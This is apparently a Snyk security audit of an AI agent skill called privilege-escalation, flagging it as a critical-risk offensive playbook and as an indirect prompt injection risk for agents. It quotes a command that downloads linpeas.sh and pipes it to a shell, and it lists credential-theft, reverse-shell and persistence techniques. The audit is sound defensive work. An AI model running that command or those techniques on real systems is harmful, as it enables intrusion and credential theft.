privilege-escalation
Fail
Audited by Snyk on Apr 11, 2026
Risk Level: CRITICAL
Full Analysis
CRITICAL E006: Malicious code pattern detected in skill scripts.
- Malicious code pattern detected (high risk: 1.00). This content is a clear offensive post‑exploitation/privesc playbook: it provides explicit, actionable instructions for credential theft (Mimikatz, DCSync/secretsdump, Kerberoasting/AS-REP), remote code execution and backdoors (reverse shells, malicious MSI/MSIexec, DLL hijacks, sc config service abuse, lambda update-function-code, SSM run-command), persistence (creating admin users/service principals, scheduled/cron abuse), and cloud metadata/IAM abuse (metadata service scraping, CreateAccessKey/AttachUserPolicy/PassRole techniques), all of which are deliberate malicious behaviors.
MEDIUM W011: Third-party content exposure detected (indirect prompt injection risk).
- Third-party content exposure detected (high risk: 0.90). The skill's reference docs explicitly instruct fetching and executing public, user-hosted content (e.g., "curl -L https://github.com/.../linpeas.sh | sh" in references/linux-privesc.md and wget/curl attacker-hosted URLs and the public bucket search https://buckets.grayhatwarfare.com/ in references/cloud-security.md), so it requires ingesting untrusted third‑party content that can materially influence subsequent actions.
MEDIUM W012: Unverifiable external dependency detected (runtime URL that controls agent).
- Potentially malicious external URL detected (high risk: 0.90). The skill explicitly runs remote code at runtime via "curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh", which fetches and executes external content (linpeas) that the guide uses as an enumeration dependency.
MEDIUM W013: Attempt to modify system services in skill instructions.
- Attempt to modify system services in skill instructions detected (high risk: 1.00). The skill explicitly instructs actionable privilege-escalation and persistence techniques (SUID/kernel exploits, UAC bypass, token manipulation, exploitation -> persistence), which push an agent to obtain elevated privileges and modify or persist on the host/system.
Issues (4)
E006
CRITICALMalicious code pattern detected in skill scripts.
W011
MEDIUMThird-party content exposure detected (indirect prompt injection risk).
W012
MEDIUMUnverifiable external dependency detected (runtime URL that controls agent).
W013
MEDIUMAttempt to modify system services in skill instructions.
Audit Metadata